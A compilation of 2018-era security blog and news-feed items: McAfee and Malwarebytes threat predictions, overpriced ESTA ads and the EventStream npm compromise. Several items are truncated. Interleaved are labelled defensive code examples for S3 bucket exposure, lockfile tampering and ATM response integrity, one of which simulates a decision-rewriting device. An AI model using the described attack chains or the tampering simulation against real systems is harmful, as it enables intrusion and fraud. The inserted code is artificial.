Attacks are usually centered on the use of one threat. Bad actors concentrate their efforts on iterating and evolving one threat at a time for effectiveness and evasion. When an attack is successful, it is classified as ransomware, cryptojacking, data exfiltration, etc., and defenses are put in place. At this point, the attack’s success rate is significantly reduced. However, if a sophisticated attack involves not one but five top-notch threats synergistically working together, the defense panorama could become very blurry. The challenge arises when an attempt is made to identify and mitigate the attack. Because the ultimate attack goals are unknown, one might get lost in the details of each threat as it plays a role in the chain.

One of the reasons synergistic threats are becoming a reality is that bad actors are improving their skills by developing foundations, kits, and reusable threat components. As attackers organize their efforts into a black-market business model, they can focus on adding value to previous building blocks. This strategy allows them to orchestrate multiple threats instead of just one to reach their goals.

An example is worth a thousand words

Imagine an attack that starts with a phishing threat—not a typical campaign using Word documents, but a novel technique. This phishing email contains a video attachment. When you open the video, your video player does not play and prompts you to update the codec. Once you run the update, a steganographic polyglot file (a simple GIF) is deployed on your system. Because it is a polyglot (a file that conforms to more than one format at the same time), the GIF file schedules a task that fetches a fileless script hosted on a compromised system. That script running in memory evaluates your system and decides to run either ransomware or a cryptocurrency miner. That is a dangerous synergistic threat in action.

The attack raises many questions: What are you dealing with? Is it phishing 2.0? Is it stegware? Is it fileless and “living off the land”? Cryptojacking? Ransomware? It is everything at the same time.

This sophisticated but feasible example demonstrates that focusing on one threat may not be enough to detect or remediate an attack. When you aim to classify the attack into a single category, you might lose the big picture and thus be less effective mitigating it. Even if you stop the attack in the middle of the chain, discovering the initial and final stages is as important for protecting against future attempts.

Be curious, be creative, connect your defenses

Tackling sophisticated attacks based on synergistic threats requires questioning every threat. What if this ransomware hit was part of something bigger? What if this phishing email pivots to a technique that employees are not trained for? What if we are missing the real goal of the attack?

Bearing these questions in mind will not only help capture the big picture, but also get the most of security solutions. We predict bad actors will add synergy to their attacks, but cyber defenses can also work synergistically.

Cybercriminals to Use Social Media Misinformation, Extortion Campaigns to Challenge Organizations’ Brands

The elections were influenced, fake news prevails, and our social media followers are all foreign government–controlled bots. At least that’s how the world feels sometimes. To say recent years have been troubled for social media companies would be an understatement. During this period a game of cat and mouse has ensued, as automated accounts are taken down, adversaries’ tactics evolve, and botnet accounts emerge looking more legitimate than ever before. In 2019, we predict an increase of misinformation and extortion campaigns via social media that will focus on brands and originate not from nation-state actors but from criminal groups.

Nation-states leverage bot battalions to deliver messages or manipulate opinion, and their effectiveness is striking. Bots often will take both sides of a story to spur debate, and this tactic works. By employing a system of amplifying nodes, as well as testing the messaging (including hashtags) to determine success rates, botnet operators demonstrate a real understanding of how to mold popular opinion on critical issues.

In one example, an account that was only two weeks old with 279 followers, most of which were other bots, began a harassment campaign against an organization. By amplification, the account generated an additional 1,500 followers in only four weeks by simply tweeting malicious content about their target.

Activities to manipulate public opinion have been well documented and bots well versed in manipulating conversations to drive agendas stand ready. Next year we expect that cybercriminals will repurpose these campaigns to extort companies by threatening to damage their brands. Organizations face a serious danger.

Data Exfiltration Attacks to Target the Cloud

In the past two years, enterprises have widely adopted the Software-as-a-Service model, such as Office 365, as well as Infrastructure- and Platform-as-a-Service cloud models, such as AWS and Azure. With this move, far more corporate data now resides in the cloud. In 2019, we expect a significant increase in attacks that follow the data to the cloud.

With the increased adoption of Office 365, we have noticed a surge of attacks on the service—especially attempts to compromise email. One threat the McAfee cloud team uncovered was the botnet KnockKnock, which targeted system accounts that typically do not have multifactor authentication. We have also seen the emergence of exploits of the trust model in the Open Authorization (OAuth) standard. One was launched by Fancy Bear, the Russian cyber espionage group, phishing users with a fake Google security app to gain access to user data.

Similarly, during the last couple of years we have seen many high-profile data breaches attributed to misconfigured Amazon S3 buckets. This is clearly not the fault of AWS. Based on the shared responsibility model, the customer is on the hook to properly configure IaaS/PaaS infrastructure and properly protect their enterprise data and user access. Complicating matters, many of these misconfigured buckets are owned by vendors in their supply chains, rather than by the target enterprises. With access to thousands of open buckets and credentials, bad actors are increasingly opting for these easy pickings.

McAfee has found that 21% of data in the cloud is sensitive—such as intellectual property, and customer and personal data—according to the McAfee Cloud Adoption and Risk Report. With a 33% increase in users collaborating on this data during the past year, cybercriminals know how to seek more targets:

  • Cloud-native attacks targeting weak APIs or ungoverned API endpoints to gain access to the data in SaaS as well as in PaaS and serverless workloads
  • Expanded reconnaissance and exfiltration of data in cloud databases (PaaS or custom applications deployed in IaaS) expanding the S3 exfiltration vector to structured data in databases or data lakes
  • Leveraging the cloud as a springboard for cloud-native man-in-the-middle (MITM) attacks (such as GhostWriter, which exploits publicly writable S3 buckets introduced by customer misconfigurations) to launch cryptojacking or ransomware attacks, or other variants of MITM attacks.
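The misconfigurations described above (publicly writable S3 buckets, often owned by a supply-chain vendor) are bucket-level ACL and public-access-block settings that the customer owns under the shared responsibility model. The following added example, which is not code from the McAfee report, classifies a bucket as publicly writable, publicly readable or private from the two API responses that expose those settings; the bucket names and grants are constructed sample data, and the live wrapper assumes boto3 and AWS credentials.

```python
"""Classify S3 buckets by the exposure their ACL grants create.

Added example, not from the McAfee report. The classifier works on the dict
shapes that boto3's get_bucket_acl() and get_public_access_block() return, so
it can be exercised offline on constructed data; only scan_account() at the
bottom talks to AWS (assumes boto3 and valid credentials).
"""
from __future__ import annotations

# Grantee URIs for the two S3 groups that AWS treats as "public".
ALL_USERS = "http://acs.amazonaws.com/groups/global/AllUsers"
AUTHENTICATED_USERS = "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"
PUBLIC_GRANTEE_URIS = {ALL_USERS, AUTHENTICATED_USERS}

# Permissions that let an anonymous party change the bucket or its objects
# (the GhostWriter-style case) versus merely read them.
WRITE_PERMISSIONS = {"WRITE", "WRITE_ACP", "FULL_CONTROL"}
READ_PERMISSIONS = {"READ", "READ_ACP", "FULL_CONTROL"}


def public_grants(acl: dict) -> list[tuple[str, str]]:
    """Return (grantee URI, permission) for every grant made to a public group."""
    found = []
    for grant in acl.get("Grants", []):
        grantee = grant.get("Grantee", {})
        if grantee.get("Type") == "Group" and grantee.get("URI") in PUBLIC_GRANTEE_URIS:
            found.append((grantee["URI"], grant["Permission"]))
    return found


def classify_bucket(acl: dict, public_access_block: dict | None) -> str:
    """Return 'public-write', 'public-read' or 'private' for one bucket.

    public_access_block is the PublicAccessBlockConfiguration dict, or None when
    the bucket has none (the API raises NoSuchPublicAccessBlockConfiguration).
    Only the bucket-level block is considered; an account-level block set via
    S3 Control would also neutralise public ACLs and is not checked here.
    """
    pab = public_access_block or {}
    # IgnorePublicAcls makes S3 behave as if public ACL grants were absent.
    if pab.get("IgnorePublicAcls"):
        return "private"
    perms = {perm for _, perm in public_grants(acl)}
    if perms & WRITE_PERMISSIONS:
        return "public-write"
    if perms & READ_PERMISSIONS:
        return "public-read"
    return "private"


def scan(buckets: dict[str, tuple[dict, dict | None]]) -> dict[str, str]:
    """Classify a mapping of bucket name -> (acl, public_access_block)."""
    return {name: classify_bucket(acl, pab) for name, (acl, pab) in buckets.items()}


# Constructed sample data in the shape boto3 returns; not from any real account.
SAMPLE_BUCKETS = {
    # Vendor bucket with anonymous WRITE and no public access block: the
    # misconfiguration that lets an attacker replace hosted content.
    "vendor-uploads": (
        {"Grants": [
            {"Grantee": {"Type": "CanonicalUser", "ID": "OWNER-ID-PLACEHOLDER"},
             "Permission": "FULL_CONTROL"},
            {"Grantee": {"Type": "Group", "URI": ALL_USERS}, "Permission": "WRITE"},
        ]},
        None,
    ),
    # Intentionally public static site: readable, not writable.
    "static-site": (
        {"Grants": [{"Grantee": {"Type": "Group", "URI": ALL_USERS}, "Permission": "READ"}]},
        {"BlockPublicAcls": False, "IgnorePublicAcls": False,
         "BlockPublicPolicy": True, "RestrictPublicBuckets": True},
    ),
    # Stale public grant that the bucket-level block already neutralises.
    "logs": (
        {"Grants": [{"Grantee": {"Type": "Group", "URI": AUTHENTICATED_USERS},
                     "Permission": "WRITE"}]},
        {"BlockPublicAcls": True, "IgnorePublicAcls": True,
         "BlockPublicPolicy": True, "RestrictPublicBuckets": True},
    ),
}


def scan_account(session=None) -> dict[str, str]:
    """Live variant: classify every bucket visible to the caller's credentials."""
    import boto3
    from botocore.exceptions import ClientError

    s3 = (session or boto3).client("s3")
    results = {}
    for bucket in s3.list_buckets()["Buckets"]:
        name = bucket["Name"]
        acl = s3.get_bucket_acl(Bucket=name)
        try:
            pab = s3.get_public_access_block(Bucket=name)["PublicAccessBlockConfiguration"]
        except ClientError as err:
            if err.response["Error"]["Code"] != "NoSuchPublicAccessBlockConfiguration":
                raise
            pab = None
        results[name] = classify_bucket(acl, pab)
    return results


if __name__ == "__main__":
    for name, verdict in scan(SAMPLE_BUCKETS).items():
        print(f"{name}: {verdict}")
```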

Voice-Controlled Digital Assistants the Next Vector in Attacking IoT Devices

As tech fans continue to fill their homes with smart gadgets, from plugs to TVs, coffee makers to refrigerators, and motion sensors to lighting, the means of gaining entry to a home network are growing rapidly, especially given how poorly secured many IoT devices remain.

But the real key to the network door next year will be the voice-controlled digital assistant, a device created in part to manage all the IoT devices within a home. As sales increase—and an explosion in adoption over the holiday season looks likely—the attraction for cybercriminals to use assistants to jump to the really interesting devices on a network will only continue to grow.

For now, the voice assistant market is still taking shape, with many brands still looking to dominate the market, in more ways than one, and it is unclear whether one device will become ubiquitous. If one does take the lead, its security features will quite rightly fall under the microscope of the media, though not perhaps before its privacy concerns have been fully examined in prose.

(Last year we highlighted privacy as the key concern for home IoT devices. Privacy will continue to be a concern, but cybercriminals will put more effort into building botnets, demanding ransoms, and threatening the destruction of property of both homes and businesses).

This opportunity to control a home’s or office’s devices will not go unnoticed by cybercriminals, who will engage in an altogether different type of writing in relation to the market winner, in the form of malicious code designed to attack not only IoT devices but also the digital assistants that are given so much license to talk to them.

Smartphones have already served as the door to a threat. In 2019, they may well become the picklock that opens a much larger door. We have already seen two threats that demonstrate what cybercriminals can do with unprotected devices, in the form of the Mirai botnet, which first struck in 2016, and IoT Reaper, in 2017. These IoT malware appeared in many variants to attack connected devices such as routers, network video recorders, and IP cameras. They expanded their reach by password cracking and exploiting known vulnerabilities to build worldwide robot networks.

Next year we expect to see two main vectors for attacking home IoT devices: routers and smartphones/tablets. The Mirai botnet demonstrated the lack of security in routers. Infected smartphones, which can already monitor and control home devices, will become one of the top targets of cybercriminals, who will employ current and new techniques to take control.

Malware authors will take advantage of phones and tablets, those already trusted controllers, to try to take over IoT devices by password cracking and exploiting vulnerabilities. These attacks will not appear suspicious because the network traffic comes from a trusted device. The success rate of attacks will increase, and the attack routes will be difficult to identify. An infected smartphone could cause the next example of hijacking the DNS settings on a router. Vulnerabilities in mobile and cloud apps are also ripe for exploitation, with smartphones at the core of the criminals’ strategy.

Infected IoT devices will supply botnets, which can launch DDoS attacks, as well as steal personal data. The more sophisticated IoT malware will exploit voice-controlled digital assistants to hide its suspicious activities from users and home-network security software. Malicious activities such as opening doors and connecting to control servers could be triggered by user voice commands (“Play music” and “What is today’s weather?”). Soon we may hear infected IoT devices themselves exclaiming: “Assistant! Open the back door!”

Cybercriminals to Increase Attacks on Identity Platforms and Edge Devices Under Siege

Large-scale data breaches of identity platforms—which offer centralized secure authentication and authorization of users, devices, and services across IT environments—have been well documented in 2018. Meanwhile, the captured data is being reused to cause further misery for its victims. In 2019, we expect to see large-scale social media platforms implement additional measures to protect customer information. However, as the platforms grow in numbers, we predict criminals will further focus their resources on such attractive, data-rich environments. The struggle between criminals and big-scale platforms will be the next big battleground.

Triton, malware that attacks industrial control systems (ICS), has demonstrated the capabilities of adversaries to remotely target manufacturing environments through their adjacent IT environments. Identity platform and “edge device” breaches will provide the keys to adversaries to launch future remote ICS attacks due to static password use across environments and constrained edge devices, which lack secure system requirements due to design limitations. (An edge device is any network-enabled system hardware or protocol within an IoT product.) We expect multifactor authentication and identity intelligence will become the best methods to provide security in this escalating battle. We also predict identity intelligence will complement multifactor authentication to strengthen the capabilities of identity platforms.

Identity is a fundamental component in securing IoT. In these ecosystems, devices and services must securely identify trusted devices so that they can ignore the rest. The identity model has shifted from user centric in traditional IT systems to machine centric for IoT systems. Unfortunately, due to the integration of operational technology and insecure “edge device” design, the IoT trust model is built on a weak foundation of assumed trust and perimeter-based security.

At Black Hat USA and DEF CON 2018, 30 talks discussed IoT edge device exploitation. That’s a large increase from just 19 talks on the topic in 2017. The increase in interest was primarily in relation to ICS, consumer, medical, and “smart city” verticals. (See Figure 1.) Smart edge devices, combined with high-speed connectivity, are enabling IoT ecosystems, but the rate at which they are advancing is compromising the security of these systems.

Figure 1: The number of conference sessions on the security of IoT devices has increased, matching the growing threat to poorly protected devices. 

Most IoT edge devices provide no self-defense (isolating critical functions, memory protection, firmware protection, least privileges, or security by default) so one successful exploit owns the device. IoT edge devices also suffer from “break once, run everywhere” attacks—due to insecure components used across many device types and verticals. (See articles on WingOS and reverse engineering.)

McAfee Advanced Threat Research team engineers have demonstrated how medical device protocols can be exploited to endanger human life and compromise patients’ privacy due to assumed trust. These examples illustrate just a few of many possible scenarios that lead us to believe adversaries will choose IoT edge devices as the path of least resistance to achieve their objectives. Servers have been hardened over the last decade, but IoT hardware is far behind. By understanding an adversary’s motives and opportunities (attack surface and access capability), we can define a set of security requirements independent of a specific attack vector.

Figure 2 gives a breakdown of the types of vulnerabilities in IoT edge devices, highlighting weak points to address by building identity and integrity capabilities into edge hardware to ensure these devices can deflect attacks.

Figure 2: Insecure protocols are the primary attack surface in IoT edge devices.

IoT security must begin on the edge with a zero-trust model and provide a hardware root of trust as the core building block for protecting against hack and shack attacks and other threats. McAfee predicts an increase in compromises on identity platforms and IoT edge devices in 2019 due to the adoption of smart cities and increased ICS activity.

The post McAfee Labs 2019 Threats Predictions Report appeared first on McAfee Blogs.

Cybercrime: There Is No End in Sight

Whoever said “crime doesn’t pay” hasn’t been following the growth of cybercrime across the globe. A thriving underground economy has evolved over the past decade to become a massive industry. Estimates in the Web of Profit research paper show cybercriminal revenues worldwide of at least $1.5 trillion – equal to the GDP of Russia. If […]

The post Cybercrime: There Is No End in Sight appeared first on The State of Security.

ESTA registration websites still lurk in paid ads on Google

Google has taken direct action against adverts promoting ESTA registration services, often offered by third parties at highly inflated prices. Ads displayed on the Google network shouldn’t display fees higher than what a public source or government charges for products or services. This tightening of the ad leash has taken a remarkable eight years to complete—and we argue it’s not done yet.

What ESTA services are these sites advertising?

The US Visa Waiver program allows citizens of 38 countries to travel visa free for up to 90 days. This requires an application for eligibility on ESTA (Electronic System for Travel Authorisation). The process is simple and takes only around 10 minutes to fill in an application online. However, many sites have sprung up offering to fill it in on your behalf.

That sounds great!

Sure, everyone hates paperwork, but many people are needlessly paying for a service that does, essentially, nothing. The idea is, you fill in the ESTA questions and submit them to Homeland Security. You then get an authorisation or a rejection. These sites want you to pay them for filling in essentially the exact same form you’d fill in on the USGOV website so they can, in turn, “submit” it on the USGOV submission page. They’ll also often charge a lot more than the standard US$14 submission fee.

That’s…not so great

The flaw here is that if you can submit this information to the third party ESTA registration website, there’s no reason why you couldn’t have just done it yourself on the official USGOV website and saved the additional fee. Once you consider the inflated fees and the fact you might be submitting sensitive personal information and/or payment details to random websites, it quickly becomes an issue.

Why pay $80 instead of $14? It doesn’t really make sense, and this is partly why Google is now cracking down on these sorts of advertisements.

What does Google say about this?

From their Advertising Policies page, Google prohibits the sale of free items. The following is not allowed:

Charging for products or services where the primary offering is available from a government or public source for free or at a lower price

Examples (non-exhaustive list): Services for passport or driving license applications; health insurance applications; documents from official registries, such as birth certificates, marriage certificates, or company registrations; exam results; tax calculators.

Note: You can bundle something free with another product or service that you provide. For example, a TV provider can bundle publicly available content with paid content, or a travel agency can bundle a visa application with a holiday package. But the free product or service can’t be advertised as the primary offering.

Google search results

We thought we’d see what, exactly, is still out there in Google search land. For this, we decided to try common ESTA-related search terms. I went with “ESTA” (naturally), “ESTA questions,” and “ESTA answers.” Here’s what I found:

Search term: ESTA

[Google Trends chart: worldwide popularity of the search term “ESTA” over time]

A search for the word “ESTA” brings back no adverts in the search results whatsoever. That’s good!

Search term: ESTA questions

[Google Trends chart: worldwide popularity of the search term “ESTA questions” over time]

A search for “ESTA questions” returned one result, which is still quite good. However, Google said common search terms would no longer fetch ads. Our search above seems pretty basic and still snagged a hit.

The website featured in the advert doesn’t mention cost on the front page, but does on its Terms of Use. Their basic fee is US$14 for the USGOV application, and US$85 for their listed services. This is arguably the kind of site Google is trying to remove.

Search Term: ESTA answers

[Google Trends chart: worldwide popularity of the search term “ESTA answers” over time]

“ESTA answers” returned four adverts.

First result: The same site listed for “ESTA questions” also made top spot under this search term.

Second result: Costs a grand total of US$89, which includes the US$14 Government fee. However, they are upfront about the fact that the service charge won’t apply should you apply directly on the Homeland Security portal. Many sites don’t mention this or hide it away in some terms and conditions.

Third result: Uh, an advert for dust extraction systems. At least there’s definitely no overpriced ESTA fee this time around.

Fourth result: The site lists their fees as US$79, which includes the US$14 Government charge.

We’ve reported all sites to Google whose adverts potentially conflict with Google’s ad policies.

How does Yahoo! stack up?

We looked at Yahoo! to see what we could find in terms of ESTA ads. As far as their Policies for Ads go, the closest thing I could find was “Low quality offers and landing page techniques” from the Oath Ad Policies page:

Services that are offered for free by the government and offered by third parties without adding any additional value to the user, such as green card lotteries

Display and Native ads promoting body branding, piercings or tattoos

This doesn’t really apply here though, as ESTA carries the $14 application fee. On the other hand, there could well be something else I’ve missed in the numerous terms and conditions for advertisers. With that in mind, let’s see what we found.

Searching for “ESTA” brought back no fewer than four ads under the search bar, and seven down the side, with actual search results quite a bit further down the page.

In terms of the sites themselves, we had a mixed response with regards to upfront pricing information.

First result: The same site in both “ESTA questions” and “ESTA answers” Google searches returns again, with their now familiar combined fee of $14 and $85.

Second result: No information visible for fees that we could find.

Third result: This site offers a fee of 59 Euros.

Fourth result: We couldn’t find details of pricing, and the FAQ drop-downs didn’t work, so if the information was in there, we couldn’t see it.

Here are the results for the adverts down the right-hand side:

First result: US$89 for services offered.

Second result: No price or FAQs visible, just a form submission process. There was a webchat, however, and we were able to obtain a price that way instead: 89 Euro/US$100 for a US ESTA submission.

Third result: No price visible that we could find.

Fourth result: US$79 plus US$14 Government fee

Fifth result: Nothing visible that we could find.

Sixth result: 84 Euros (this includes a “2-year concierge service”)

Seventh result: £37.82, US$14 Government fee, plus £1 “overseas transition/calling card fee”

Looking for travel assistance online?

There are many pitfalls lurking online the moment you go looking for visas, ESTAs, or anything else. It seems baffling to me that people would pay someone else to submit a form to a third party when they have to fill out the form themselves first. Are the extra services promoted by these sites really worth it? Some claim to retain your data “for up to two years” in case you need to reapply. The ESTA is valid for two years, by which point they’d no longer be retaining your information, so I don’t see how this helps.

“Aha,” they’ll say. “We don’t retain the data for two years in case you need to apply for the ESTA again. We retain it in case you’re denied authorisation so you can have another go!”

Well, great, except not really. If you’re denied an ESTA at application time, that’s the end of that:

If a traveler is denied ESTA authorization and his or her circumstances have not changed, a new application will also be denied. A traveler who is not eligible for ESTA is not eligible for travel under the Visa Waiver Program and should apply for a nonimmigrant visa at a U.S. Embassy or Consulate. Reapplying with false information in order to qualify for a travel authorization will make the traveler permanently ineligible for travel to the United States under the Visa Waiver Program

Time for a little DIY

On a similar note, these sites do offer to check that all of your information is correct before submitting. The information you need to supply for an ESTA is basic stuff, though: name, address, passport number, and answers to a series of yes/no questions. It’s not complicated, and you could easily have a friend or relative look it over before submitting it online yourself. “Concierge” services sound good, but there’s so much information online, you shouldn’t have trouble finding a hotel or a taxi service or anything else for that matter.

If you insist on making use of an ESTA application website, keep in mind the above commentary. You should also be wary of sites that aren’t upfront with their pricing. Pay particular attention as to whether they retain a copy of your data and for how long. If they promote the benefit of retaining it for less than two years in case you want to “reapply,” that’s not a great sign. If they refer to the ESTA as a “visa,” also not good. (It isn’t a visa; it’s access to participation in the Visa Waiver Program.)

Keep your passport and your online wits close to hand, and you won’t have any problems. Safe travels!

The post ESTA registration websites still lurk in paid ads on Google appeared first on Malwarebytes Labs.

SecurityWeek RSS Feed: Cryptocurrency-Stealing Code Distributed via Popular Library

The popular EventStream Node.js library was recently modified to fetch malicious code designed to steal crypto-currencies.

Designed as a toolkit to make creating and working with streams easy, the JavaScript package has around two million downloads a week, which makes it a valuable resource to application developers and malicious actors alike.
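The defensive check a practitioner would want after an incident like this is a diff of the dependency lockfile, since npm's package-lock.json records a version, a resolved URL and an integrity hash for every installed tarball. The script below is an added example, not code from SecurityWeek or the EventStream project; the two lockfiles and the package names in them are constructed placeholders, and the finding labels are this example's own.

```python
# Added example (not code from the SecurityWeek article or the EventStream
# project): diff two npm package-lock.json documents and flag the changes a
# hijacked dependency tends to leave behind. Lockfile contents below are
# constructed samples; package names are placeholders, not real packages.
import json

REGISTRY = "https://registry.npmjs.org/"


def load_lockfile(path: str) -> dict:
    """Read a package-lock.json from disk."""
    with open(path, encoding="utf-8") as fh:
        return json.load(fh)


def _packages(lock: dict) -> dict:
    """Flatten a lockfile to {name: metadata} for lockfileVersion 2/3
    ("packages", keyed by install path) and v1 ("dependencies", nested)."""
    out = {}
    if "packages" in lock:
        for path, meta in lock["packages"].items():
            if not path:          # "" is the root project entry, not a dependency
                continue
            out[path.rsplit("node_modules/", 1)[-1]] = meta
    else:
        def walk(deps):
            for name, meta in deps.items():
                out[name] = meta
                walk(meta.get("dependencies", {}))
        walk(lock.get("dependencies", {}))
    return out


def diff_lockfiles(old: dict, new: dict) -> list:
    """Return sorted (finding, package, detail) tuples.

    INTEGRITY_CHANGED_SAME_VERSION is the loudest signal: the tarball for an
    already-pinned version was replaced. ADDED catches a new transitive
    dependency pulled in by an upgraded package. OFF_REGISTRY_SOURCE catches a
    'resolved' URL that moved away from the expected registry."""
    old_p, new_p = _packages(old), _packages(new)
    findings = []
    for name, meta in new_p.items():
        prev = old_p.get(name)
        if prev is None:
            findings.append(("ADDED", name, meta.get("version")))
        elif prev.get("version") == meta.get("version"):
            if prev.get("integrity") != meta.get("integrity"):
                findings.append(("INTEGRITY_CHANGED_SAME_VERSION", name, meta.get("version")))
        else:
            findings.append(("VERSION_CHANGED", name,
                             f"{prev.get('version')} -> {meta.get('version')}"))
        if not str(meta.get("resolved", "")).startswith(REGISTRY):
            findings.append(("OFF_REGISTRY_SOURCE", name, meta.get("resolved")))
    for name, meta in old_p.items():
        if name not in new_p:
            findings.append(("REMOVED", name, meta.get("version")))
    return sorted(findings)


def _entry(version: str, integrity: str, name: str) -> dict:
    return {"version": version,
            "resolved": f"{REGISTRY}{name}/-/{name}-{version}.tgz",
            "integrity": integrity}


# Constructed sample: the lockfile committed last week ...
OLD_LOCK = {"lockfileVersion": 2, "packages": {
    "": {"name": "checkout-app", "version": "1.0.0"},
    "node_modules/stream-toolkit": _entry("3.3.4", "sha512-AAAA", "stream-toolkit"),
    "node_modules/through-helper": _entry("2.0.0", "sha512-BBBB", "through-helper"),
    "node_modules/left-util": _entry("1.0.0", "sha512-CCCC", "left-util"),
}}

# ... and the one produced by `npm install` today: stream-toolkit moved to a
# new patch release that drags in a previously unseen transitive dependency,
# and through-helper's tarball hash changed although its version did not.
NEW_LOCK = {"lockfileVersion": 2, "packages": {
    "": {"name": "checkout-app", "version": "1.0.0"},
    "node_modules/stream-toolkit": _entry("3.3.6", "sha512-DDDD", "stream-toolkit"),
    "node_modules/stream-toolkit/node_modules/extra-map": _entry("0.1.1", "sha512-EEEE", "extra-map"),
    "node_modules/through-helper": _entry("2.0.0", "sha512-FFFF", "through-helper"),
    "node_modules/left-util": _entry("1.0.0", "sha512-CCCC", "left-util"),
}}

if __name__ == "__main__":
    # Real use: diff_lockfiles(load_lockfile("package-lock.json.old"), load_lockfile("package-lock.json"))
    for finding in diff_lockfiles(OLD_LOCK, NEW_LOCK):
        print(*finding)
```

Run against the constructed samples it reports the added `extra-map`, the same-version integrity change on `through-helper`, and the version bump on `stream-toolkit`; wiring it into CI so that a same-version integrity change or a new transitive dependency blocks the build is the design point, since those are the changes a developer running `npm install` never looks at.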



Malwarebytes’ 2019 security predictions

Every year, we at Malwarebytes Labs like to stare into our crystal ball and foretell the future of malware.

Okay, maybe we don’t have a crystal ball, but we do have years and years of experience in observing trends and sensing shifts in patterns. When it comes to security, though, we can only know so much. For example, we guarantee there’ll be some kind of development that we had zero indication would occur. We can also pretty much assure you that data breaches will keep happening—just as the sun rises and sets.

And while all hope is for a malware-free 2019, the reality will likely look a little more like this:

New, high-profile breaches will push the security industry to finally solve the username/password problem. The ineffective username/password conundrum has plagued consumers and businesses for years. There are many solutions out there—asymmetric cryptography, biometrics, blockchain, hardware solutions, etc.—but so far, the security industry has not been able to settle on a standard to fix the problem. In 2019, we will see a more concerted effort to replace passwords altogether.

IoT botnets will come to a device near you. In the second half of 2018, we saw several thousand MikroTik routers hacked to serve up coin miners. This is only the beginning of what we will likely see in the new year, with more and more hardware devices being compromised to serve up everything from cryptominers to Trojans. Large-scale compromises of routers and IoT devices are going to take place, and they are a lot harder to patch than computers. Patching alone does not fix the problem if the device is already infected.

Digital skimming will increase in frequency and sophistication. Cybercriminals are going after websites that process payments and compromising the checkout page directly. Whether you are purchasing roller skates or concert tickets, if the shopping cart software is faulty, the information you enter on the checkout page is sent in clear text, allowing attackers to intercept it in real time. Security companies saw evidence of this with the British Airways and Ticketmaster hacks.

Microsoft Edge will be a prime target for new zero-day attacks and exploit kits. Transitioning out of IE, Microsoft Edge is gaining more market share. We expect to see more mainstream Edge exploits as we segue to this next generation browser. Firefox and Chrome have done a lot to shore up their own technology, making Edge the next big target.

EternalBlue or a copycat will become the de facto method for spreading malware in 2019. Because it can self-propagate, EternalBlue and other exploits for the same SMB vulnerability present a particular challenge for organizations, and cybercriminals will exploit this to distribute new malware.

Cryptomining on desktops, at least on the consumer side, will just about die. Again, as we saw in October (2018) with MikroTik routers being hacked to serve up miners, cybercriminals just aren’t getting value out of targeting individual consumers with cryptominers. Instead, attacks distributing cryptominers will focus on platforms that can generate more revenue (servers, IoT) and will fade from other platforms (browser-based mining).

Attacks designed to avoid detection, like soundloggers, will slip into the wild. Keyloggers that record sounds are sometimes called soundloggers, and they are able to listen to the cadence and volume of tapping to determine which keys are struck on a keyboard. Already in existence, this type of attack was developed by nation-state actors to target adversaries. Attacks using this and other new attack methodologies designed to avoid detection are likely to slip out into the wild against businesses and the general public.

Artificial Intelligence will be used in the creation of malicious executables. While the idea of having malicious AI running on a victim’s system is pure science fiction, at least for the next 10 years, malware that is modified by, created by, and communicating with an AI is a dangerous reality. An AI that communicates with compromised computers and monitors which malware is detected, and how, can quickly deploy countermeasures. AI controllers will enable malware built to modify its own code to avoid being detected on the system, regardless of the security tool deployed. Imagine a malware infection that acts almost like “The Borg” from Star Trek, adjusting and acclimating its attack and defense methods on the fly based on what it is up against.

Bring your own security grows as trust declines. More and more consumers are bringing their own security to the workplace as a first or second layer of defense to protect their personal information. Malwarebytes recently conducted global research and found that nearly 200,000 companies had a consumer version of Malwarebytes installed. Education was the industry most prone to adopting BYOS, followed by software/technology and business services.

The post Malwarebytes’ 2019 security predictions appeared first on Malwarebytes Labs.

ATM attackers strike again: Are you at risk?

The United States National ATM Council recently released information about a series of ATM attacks using rogue network devices. The criminals opened the upper half of the ATM and installed the device, most likely into the Ethernet switch. The device then intercepted the ATM’s network traffic and changed the bank’s “withdraw denied” response to “withdraw approved,” presumably only for the criminals’ cards. For many readers, the attacks’ success may be surprising. However, IBM X-Force Red … More
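The attack above only works because the terminal acts on whatever bytes arrive on the wire. The mitigation a practitioner would want to see is the host's decision bound to the transaction with a message authentication code under a key the in-line device does not hold, so a rewritten response fails verification. The snippet below is an added example, not code from Help Net Security or IBM X-Force Red; the message layout, field names and demo key are assumptions made for the illustration (a real EFT switch carries its own MAC field inside ISO 8583).

```python
# Added example, not code from the Help Net Security / IBM X-Force Red piece.
# The host's authorization decision is bound to the transaction with an
# HMAC-SHA256 tag. A device on the path that flips "DENIED" to "APPROVED"
# cannot recompute the tag, so the terminal rejects the message and keeps
# the cash. Message layout, field names and the key are assumptions made
# for this illustration.
import hmac
import hashlib

DECISIONS = ("APPROVED", "DENIED")


def build_response(key: bytes, txn_id: str, amount_cents: int, decision: str) -> bytes:
    """Host side: decision plus a tag over transaction id, amount and
    decision, i.e. exactly the fields an in-line device would want to edit."""
    if decision not in DECISIONS:
        raise ValueError(decision)
    body = f"{txn_id}|{amount_cents}|{decision}".encode()
    tag = hmac.new(key, body, hashlib.sha256).hexdigest().encode()
    return body + b"|" + tag


def verify_response(key: bytes, wire: bytes, sent_txn_id: str, sent_amount_cents: int):
    """Terminal side. Returns (ok, decision); anything that is not ok must be
    treated as DENIED. Checks, in order: the message parses, the tag matches
    (constant-time compare), and the response answers the request this
    terminal actually sent (no replay of an old APPROVED, no amount swap)."""
    try:
        txn_id, amount, decision, tag = wire.decode().split("|")
    except ValueError:
        return False, "DENIED"
    body = f"{txn_id}|{amount}|{decision}".encode()
    expected = hmac.new(key, body, hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, tag):
        return False, "DENIED"                     # tampered or forged
    if txn_id != sent_txn_id or amount != str(sent_amount_cents):
        return False, "DENIED"                     # replayed or substituted
    if decision not in DECISIONS:
        return False, "DENIED"
    return True, decision


def rewrite_decision(wire: bytes) -> bytes:
    """Constructed stand-in for the rogue device in the test below: flip the
    decision field and pass everything else through untouched."""
    return wire.replace(b"|DENIED|", b"|APPROVED|")


if __name__ == "__main__":
    KEY = b"constructed-demo-key-not-for-production"
    genuine = build_response(KEY, "txn-0001", 20000, "DENIED")
    print(verify_response(KEY, genuine, "txn-0001", 20000))                    # (True, 'DENIED')
    print(verify_response(KEY, rewrite_decision(genuine), "txn-0001", 20000))  # (False, 'DENIED')
```

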